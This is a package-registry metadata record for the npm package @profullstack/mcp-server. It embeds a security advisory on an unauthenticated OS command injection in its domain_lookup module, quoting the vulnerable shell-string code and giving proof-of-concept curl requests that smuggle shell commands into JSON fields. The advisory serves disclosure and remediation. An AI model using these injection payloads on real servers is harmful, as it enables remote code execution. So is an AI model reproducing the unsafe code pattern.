{"id":11678198,"name":"@profullstack/mcp-server","ecosystem":"npm","description":"A generic, modular server for implementing the Model Context Protocol (MCP)","homepage":"https://profullstack.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/profullstack/mcp-server","keywords_array":["mcp","model","ai","server","api"],"namespace":"profullstack","versions_count":18,"first_release_published_at":"2025-05-23T16:28:10.461Z","latest_release_published_at":"2025-06-16T02:47:12.256Z","latest_release_number":"1.4.12","last_synced_at":"2026-05-18T10:53:29.900Z","created_at":"2025-05-23T16:29:03.049Z","updated_at":"2026-05-18T13:39:24.780Z","registry_url":"https://www.npmjs.com/package/@profullstack/mcp-server","install_command":"npm install @profullstack/mcp-server","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.4.12"}},"repo_metadata":{"id":292866453,"uuid":"982197253","full_name":"profullstack/mcp-server","owner":"profullstack","description":"A generic, modular server for implementing the Model Context Protocol (MCP). 
","archived":false,"fork":false,"pushed_at":"2025-08-14T15:41:00.000Z","size":1185,"stargazers_count":40,"open_issues_count":1,"forks_count":3,"subscribers_count":2,"default_branch":"master","last_synced_at":"2026-02-24T00:21:04.538Z","etag":null,"topics":["mcp-server"],"latest_commit_sha":null,"homepage":"https://mcp.profullstack.com","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"isc","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/profullstack.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-05-12T14:13:21.000Z","updated_at":"2026-02-16T16:41:39.000Z","dependencies_parsed_at":"2025-05-12T15:49:40.899Z","dependency_job_id":"8ec546a6-aa52-4959-b79c-fcfc9125b2ae","html_url":"https://github.com/profullstack/mcp-server","commit_stats":null,"previous_names":["profullstack/mcp-server"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/profullstack/mcp-server","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/profullstack%2Fmcp-server","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/profullstack%2Fmcp-server/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/profullstack%2Fmcp-server/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/profullstack%2Fmcp-server/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/profullstack","download_url":"https://codeload.github.com/profullstack/mcp-s
erver/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/profullstack%2Fmcp-server/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32803655,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-08T08:22:46.396Z","status":"ssl_error","status_checked_at":"2026-05-08T08:22:45.650Z","response_time":54,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"profullstack","name":"profullstack","uuid":"44715329","kind":"organization","description":"Professional fullstack development","email":"anthony@profullstack.com","website":"http://profullstack.com","location":"Aptos, 
CA","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/44715329?v=4","repositories_count":37,"last_synced_at":"2024-04-14T06:41:17.350Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/profullstack","funding_links":[],"total_stars":48,"followers":5,"following":0,"created_at":"2023-03-06T14:27:49.038Z","updated_at":"2024-04-14T06:41:23.439Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/profullstack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/profullstack/repositories"},"tags":[]},"repo_metadata_updated_at":"2026-05-18T13:39:24.758Z","dependent_packages_count":0,"downloads":362,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":24.586083468546434,"dependent_packages_count":35.486515488693335,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.036299478619885},"purl":"pkg:npm/%40profullstack/mcp-server","advisories":[{"uuid":"GSA_kwCzR0hTQS12NndqLWM4M2YtdjQ2eM4ABWg8","url":"https://github.com/advisories/GHSA-v6wj-c83f-v46x","title":"@profullstack/mcp-server vulnerable to OS Command Injection in domain_lookup Module","description":"\u003chtml\u003e\n\u003cbody\u003e\n\u003c!--StartFragment--\u003e\u003chtml\u003e\u003chead\u003e\u003c/head\u003e\u003cbody\u003e\u003ch1\u003eSecurity Advisory: OS Command Injection in \u003ccode\u003eprofullstack/mcp-server\u003c/code\u003e \u003ccode\u003edomain_lookup\u003c/code\u003e Module\u003c/h1\u003e\n\nField | Value\n-- | --\nProject | profullstack/mcp-server\nRepository | https://github.com/profullstack/mcp-server\nAffected Commit | 2e8ea913573610667ad54e31dba2e8198ebf7cf9\nAffected Module | mcp_modules/domain_lookup\nAffected Endpoints | POST /domain-lookup/check, POST /domain-lookup/bulk\nVulnerability Type | CWE-78: OS Command Injection\nCVSS 3.1 Score | 9.8 (Critical) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\nAuthentication 
Required | None\nDefault Network Exposure | Bind address 0.0.0.0, no global authentication middleware\nValidated | 2026-04-21 (initial), 2026-04-28 (re-confirmed)\n\n\n\u003chr\u003e\n\u003ch2\u003eSummary\u003c/h2\u003e\n\u003cp\u003eThe \u003ccode\u003edomain_lookup\u003c/code\u003e module assembles a shell command string by concatenating user-controlled input (\u003ccode\u003edomains\u003c/code\u003e / \u003ccode\u003ekeywords\u003c/code\u003e) and passes it to \u003ccode\u003eexecAsync()\u003c/code\u003e. Both HTTP endpoints reach the same sink. Because there is no argument quoting, escaping, or allowlist — and no authentication on the server — an unauthenticated remote attacker can execute arbitrary OS commands as the server process.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2\u003eAffected Code\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eindex.js:27\u003c/code\u003e — server binds to \u003ccode\u003e0.0.0.0\u003c/code\u003e, no global auth middleware.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003emcp_modules/domain_lookup/index.js:52\u003c/code\u003e — registers \u003ccode\u003ePOST /domain-lookup/check\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003emcp_modules/domain_lookup/index.js:55\u003c/code\u003e — registers \u003ccode\u003ePOST /domain-lookup/bulk\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003emcp_modules/domain_lookup/src/service.js:19, :20\u003c/code\u003e — \u003ccode\u003ebuildTldxCommand()\u003c/code\u003e concatenates user input into the shell string.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003emcp_modules/domain_lookup/src/service.js:114, :115, :142\u003c/code\u003e — \u003ccode\u003eexecAsync(command)\u003c/code\u003e sink reached from both routes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2\u003eVulnerable Code\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFile:\u003c/strong\u003e 
\u003ccode\u003emcp_modules/domain_lookup/src/service.js\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eStep 1 — User input concatenated directly into a shell string:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-js\"\u003ebuildTldxCommand(keywords, options = {}) {\n  let command = `tldx ${keywords.join(' ')}`;\n\n  if (options.prefixes?.length) {\n    command += ` --prefixes ${options.prefixes.join(',')}`;\n  }\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003cstrong\u003eStep 2 — That shell string is executed as-is:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-js\"\u003easync checkDomainAvailability(domains, options = {}) {\n  try {\n    const command = this.buildTldxCommand(domains, options);\n    const { stdout, stderr } = await execAsync(command);\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eThere is no sanitization between Step 1 and Step 2. Shell metacharacters (\u003ccode\u003e;\u003c/code\u003e, \u003ccode\u003e|\u003c/code\u003e, \u003ccode\u003e$()\u003c/code\u003e, etc.) 
in user input are interpreted by \u003ccode\u003e/bin/sh\u003c/code\u003e at execution time.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2\u003eProof of Concept\u003c/h2\u003e\n\u003cp\u003eTested against a local Docker build of the affected commit (\u003ccode\u003e0.0.0.0:13000-\u0026gt;3000/tcp\u003c/code\u003e).\u003c/p\u003e\n\u003ch3\u003ePoC A — \u003ccode\u003ePOST /domain-lookup/check\u003c/code\u003e\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003eRequest:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003ecurl -X POST http://localhost:13000/domain-lookup/check \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"domains\":[\"example.com; echo final_check_poc \u0026gt; /tmp/verify-exports/final_check.txt; #\"]}'\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003cstrong\u003eResponse:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003eHTTP/1.1 500 Internal Server Error\naccess-control-allow-origin: *\ncontent-type: application/json\nDate: Tue, 21 Apr 2026 04:32:39 GMT\n\n{\"error\":\"tldx command failed: tldx command failed: /bin/sh: tldx: not found\\n\"}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003cstrong\u003eSide effect confirmed inside container:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e$ cat /tmp/verify-exports/final_check.txt\nfinal_check_poc\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch3\u003ePoC B — \u003ccode\u003ePOST /domain-lookup/bulk\u003c/code\u003e\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003eRequest:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003ecurl -X POST http://localhost:13000/domain-lookup/bulk \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"keywords\":[\"safe\",\"x; echo final_bulk_poc \u0026gt; /tmp/verify-exports/final_bulk.txt; #\"]}'\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003cstrong\u003eResponse:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003eHTTP/1.1 500 Internal 
Server Error\naccess-control-allow-origin: *\ncontent-type: application/json\nDate: Tue, 21 Apr 2026 04:32:40 GMT\n\n{\"error\":\"Bulk domain check failed: Bulk domain check failed: /bin/sh: tldx: not found\\n\"}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003cstrong\u003eSide effect confirmed inside container:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e$ cat /tmp/verify-exports/final_bulk.txt\nfinal_bulk_poc\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch3\u003eNote on HTTP 500\u003c/h3\u003e\n\u003cp\u003eBoth requests return HTTP 500 because \u003ccode\u003etldx\u003c/code\u003e is not installed in the test container. The injected commands are interpreted by the shell \u003cstrong\u003ebefore\u003c/strong\u003e \u003ccode\u003etldx\u003c/code\u003e is invoked. The marker files confirm that attacker-controlled commands executed successfully despite the 500 response. In a production environment where \u003ccode\u003etldx\u003c/code\u003e is installed, both the intended function and the injected commands execute.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2\u003eImpact\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUnauthenticated remote code execution as the server process UID.\u003c/li\u003e\n\u003cli\u003eFull read/write access to any file the server process can access.\u003c/li\u003e\n\u003cli\u003ePotential for outbound connections, credential theft, persistence, and lateral movement.\u003c/li\u003e\n\u003cli\u003eReproducible with a single unauthenticated HTTP POST to either of two documented endpoints.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2\u003eSuggested Remediation\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eReplace \u003ccode\u003eexecAsync(command)\u003c/code\u003e with \u003ccode\u003echild_process.execFile\u003c/code\u003e or \u003ccode\u003espawn('tldx', [keyword1, keyword2, ...])\u003c/code\u003e — pass arguments as an array, never as a concatenated shell string.\u003c/li\u003e\n\u003cli\u003eValidate all 
domain/keyword input against a strict allowlist (RFC 1035 hostname syntax) before invoking the external binary; reject any input containing shell metacharacters.\u003c/li\u003e\n\u003cli\u003eAdd a global authentication middleware so that no HTTP-exposed module is callable anonymously.\u003c/li\u003e\n\u003cli\u003eDefault the server bind address to \u003ccode\u003e127.0.0.1\u003c/code\u003e and require explicit opt-in for non-loopback bindings.\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003ch2\u003eVerification Environment\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eLocal Docker container only; no third-party deployment was tested.\u003c/li\u003e\n\u003cli\u003eThe container does not include the \u003ccode\u003etldx\u003c/code\u003e binary; this is intentional for safe local PoC and does not affect exploitability.\u003c/li\u003e\n\u003c/ul\u003e\u003c/body\u003e\u003c/html\u003e\u003c!--EndFragment--\u003e\n\u003c/body\u003e\n\u003c/html\u003e","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-05-09T00:42:12.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/profullstack/mcp-server/security/advisories/GHSA-v6wj-c83f-v46x","https://github.com/advisories/GHSA-v6wj-c83f-v46x"],"source_kind":"github","identifiers":["GHSA-v6wj-c83f-v46x"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-09T01:00:09.216Z","updated_at":"2026-05-09T06:00:08.212Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12NndqLWM4M2YtdjQ2eM4ABWg8","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12NndqLWM4M2YtdjQ2eM4ABWg8","packages":[{"ecosystem":"npm","package_name":"@profullstack/mcp-server","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 
1.4.12"}],"purl":"pkg:npm/%40profullstack%2Fmcp-server"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12NndqLWM4M2YtdjQ2eM4ABWg8/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@profullstack/mcp-server","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@profullstack/mcp-server","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@profullstack/mcp-server/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-30T00:04:40.016Z","issues_count":3,"pull_requests_count":0,"avg_time_to_close_issue":193100.0,"avg_time_to_close_pull_request":null,"issues_closed_count":2,"pull_requests_closed_count":0,"pull_request_authors_count":0,"issue_authors_count":2,"avg_comments_per_issue":2.0,"avg_comments_per_pull_request":null,"merged_pull_requests_count":0,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":3,"past_year_pull_requests_count":0,"past_year_avg_time_to_close_issue":193100.0,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":2,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":0,"past_year_issue_authors_count":2,"past_year_avg_comments_per_issue":2.0,"past_year_avg_comments_per_pull_request":null,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/profullstack%2Fmcp-server/issues","maintainers":[],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@profullstack%2Fmcp-server/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@profullstack%2Fmcp-server/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/n
pmjs.org/packages/@profullstack%2Fmcp-server/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@profullstack%2Fmcp-server/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@profullstack%2Fmcp-server/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@profullstack%2Fmcp-server/codemeta","maintainers":[{"uuid":"chovy","login":"chovy","name":null,"email":"anthony@chovy.com","url":null,"packages_count":265,"html_url":"https://www.npmjs.com/~chovy","role":null,"created_at":"2025-05-23T16:37:58.036Z","updated_at":"2025-05-23T16:37:58.036Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/chovy/packages"},{"uuid":"devpreshy","login":"devpreshy","name":null,"email":"devpreshy@gmail.com","url":null,"packages_count":243,"html_url":"https://www.npmjs.com/~devpreshy","role":null,"created_at":"2025-05-23T16:37:58.096Z","updated_at":"2025-05-23T16:37:58.096Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/devpreshy/packages"}]}